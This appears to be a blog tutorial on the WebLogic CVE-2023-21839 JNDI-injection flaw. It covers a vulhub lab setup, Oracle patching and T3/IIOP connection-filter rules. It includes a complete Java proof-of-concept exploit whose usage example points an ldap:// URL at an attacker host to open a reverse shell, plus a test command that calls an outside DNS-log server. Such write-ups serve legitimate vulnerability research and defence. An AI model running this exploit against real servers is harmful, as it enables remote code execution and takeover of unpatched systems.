WebLogic Deserialization Vulnerability (CVE-2023-21839)
Introduction
WebLogic is a Java application server from Oracle Corporation; more precisely, it is middleware built on the Java EE architecture. It is used to develop, integrate, deploy and manage large-scale distributed web applications, network applications and database applications.
Vulnerability Overview
CVE-2023–21839
WebLogic Server has a flaw in its IIOP/T3 protocol handling. When IIOP or T3 is enabled, an unauthenticated attacker with network access to the listener can exploit it: the attacker binds a weblogic.deployment.jms.ForeignOpaqueReference object into the server's JNDI tree over T3 and then looks it up, and resolving that reference makes the server perform a JNDI lookup of the attacker-controlled remoteJNDIName (an ldap:// URL), which leads to remote code execution. A successful attack lets the attacker take over the WebLogic Server and execute arbitrary commands, which can crash the server or leak sensitive data.
Affected Versions
- Weblogic 12.2.1.3.0
- Weblogic 12.2.1.4.0
- Weblogic 14.1.1.0.0
Environment
You can use vulhub to build the vulnerable environment:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
Clone the project:
git clone https://github.com/vulhub/vulhub.git
In the weblogic/CVE-2023-21839/ directory, run the following command to download and start WebLogic 12.2.1.3:
docker-compose up -d
Then visit http://your-ip:7001/console; the console login page should be displayed.
Vulnerability Reproduction
You can use the tool by DXask88MA (written in Java):
The selected sink is
weblogic.deployment.jms.ForeignOpaqueReference.class
Alternatively, the tool by 4ra1n, written in Go, constructs the T3 packets itself:
The selected sink is
weblogic.jndi.internal.ForeignOpaqueReference.class
POC:
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

// Requires the WebLogic client classes (weblogic.jar / wlthint3client.jar from a WebLogic install) on the classpath.
public class CVE_2023_21839 {
    static String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE = "[*]java -jar Target ip:port ldap address\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    // Opens a T3 connection to the target's JNDI tree.
    private static InitialContext getInitialContext(String url) throws NamingException {
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }

    public static void main(String[] args) throws Exception {
        if (args.length < 2) {
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c = getInitialContext("t3://" + t3Url);

        // Environment the server will use when it resolves the reference. The lookup name is a
        // full ldap:// URL, so JNDI dispatches it to the LDAP URL context regardless of this factory.
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");

        // Build the ForeignOpaqueReference sink object; both fields are private, so set them reflectively.
        weblogic.deployment.jms.ForeignOpaqueReference f = new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f, env);
        Field remoteJNDIName = weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f, ldapUrl);

        // Bind the reference under a random name, then look it up: the lookup makes the server
        // call getReferent(), which performs the JNDI lookup of the attacker-supplied LDAP URL.
        String bindName = new Random(System.currentTimeMillis()).nextLong() + "";
        try {
            c.bind(bindName, f);
            c.lookup(bindName);
        } catch (Exception e) {
            // The lookup throws on the client side after the server has already contacted the LDAP URL; ignore it.
        }
    }
}
To test with a DNS log service, download the jar file from:
https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839
Run the command:
java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test
Check the DNS log: if the request is received, the server performed the JNDI lookup and the vulnerability is confirmed. Note that a DNS hit only proves the outbound lookup; actual code execution by loading a class from the LDAP server additionally requires a JDK older than 8u191 (later JDKs disable LDAP remote codebase loading by default), otherwise a deserialization gadget returned in the LDAP response is needed.
Remediation
- Apply the Oracle patch from the January 2023 Critical Patch Update: https://support.oracle.com/rs?type=doc&id=2917213.2
- Restrict T3 and IIOP access: disable the protocols on listeners reachable from untrusted networks, or allow them only from trusted hosts (for example with a WebLogic connection filter). This limits exposure but does not replace the patch.
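As an added example of the second remediation (not from the original post), the rules below use WebLogic's built-in connection filter to deny T3 and IIOP from everywhere except a trusted management network. The 10.0.0.0/8 range is an assumption to be replaced with the real one. They are entered in the Administration Console under Domain > Security > Filter, with Connection Filter set to weblogic.security.net.ConnectionFilterImpl and the rules in the Connection Filter Rules field.

```text
# Connection filter rules, one per line: target localAddress localPort action protocols
# Rules are evaluated in order and the first matching rule decides.
# Assumed trusted management network (example value, replace with yours).
10.0.0.0/8  *  *  allow  t3 t3s iiop iiops
# Everyone else gets no T3/IIOP at all; HTTP(S) is unaffected by these rules.
0.0.0.0/0   *  *  deny   t3 t3s iiop iiops
```

After saving the rules and restarting the servers, a T3 connection from outside the allowed range is rejected at the listener, so the bind and lookup in the PoC never reach the JNDI tree.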
Reference link:
Originally published at https://tutorialboy24.blogspot.com/2023/04/weblogic-deserialization-vulnerability.html